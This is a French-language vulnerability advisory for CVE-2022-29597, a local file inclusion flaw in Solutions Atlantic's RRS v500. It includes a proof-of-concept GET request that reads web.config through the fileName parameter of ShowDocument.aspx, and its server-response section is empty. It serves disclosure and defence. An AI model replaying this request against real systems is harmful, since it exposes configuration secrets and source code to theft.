
L'application RRS v500 est vulnérable à une inclusion locale de fichier (LFI).
L'application RRS v500 de Solutions Atlantic est vulnérable à une inclusion de fichier local (LFI). Tout utilisateur authentifié peut référencer des fichiers internes du système dans les requêtes envoyées à la page /RRSWeb/maint/ShowDocument/ShowDocument.aspx. Le serveur répondra avec succès en renvoyant le contenu du fichier interne demandé. Cette capacité pourrait permettre à des adversaires d'extraire des données sensibles et/ou des fichiers du système de fichiers sous-jacent, d'obtenir des connaissances sur le fonctionnement interne du système ou d'accéder au code source de l'application.
URL Mitre : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29597
URL NIST : https://nvd.nist.gov/vuln/detail/CVE-2022-29597
URL affectée :
/RRSWeb/maint/ShowDocument/ShowDocument.aspxLors de l'ouverture ou du téléchargement d'un PDF depuis le site RRS, une requête est envoyée à l'URL affectée qui inclut un paramètre fileName. Ce paramètre pourrait être modifié pour inclure un chemin interne du système, tel que web.config. Le serveur répondra alors avec le fichier demandé.
Requête GET avec un chemin interne vers web.config :
GET /RRSWeb/maint/ShowDocument/ShowDocument.aspx?fileName=C:\\Program%20Files\\Solutions%20Atlantic\\RRS\\RRSWeb\\web.config HTTP/1.1
Host: <REDACTED>
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://<REDACTED>/RRSweb/default.aspx
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: _ga=<REDACTED>; ASP.NET_SessionId=<REDACTED>
Connection: Keep-Alive
Réponse du serveur :

Avril 2022